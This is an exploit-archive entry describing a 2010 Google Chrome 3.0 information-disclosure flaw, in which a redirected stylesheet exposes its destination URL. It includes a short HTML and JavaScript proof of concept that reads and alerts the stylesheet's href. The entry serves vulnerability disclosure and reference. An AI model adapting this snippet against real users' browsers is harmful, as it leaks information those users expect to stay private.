Google Chrome 3.0 - Style Sheet redirection Information Disclosure

2010-01-22T00:00:00
ID EXPLOITPACK:B9FCAE7FC3AFB5160E67C9C29680D23E
Type exploitpack
Reporter Cesar Cerrudo
Modified 2010-01-22T00:00:00

Description

Google Chrome 3.0 - Style Sheet redirection Information Disclosure

                                        
                                            source: https://www.securityfocus.com/bid/37917/info

Google Chrome is prone to a remote information-disclosure vulnerability.

Attackers can exploit this issue to obtain potentially sensitive information that may lead to further attacks. 

<link rel="stylesheet" type="text/css" href="http://www.example.com"> Hola <script language="javascript"> setTimeout("alert(document.styleSheets[0].href)", 10000); //setTimeout is used just to wait for page loading </script>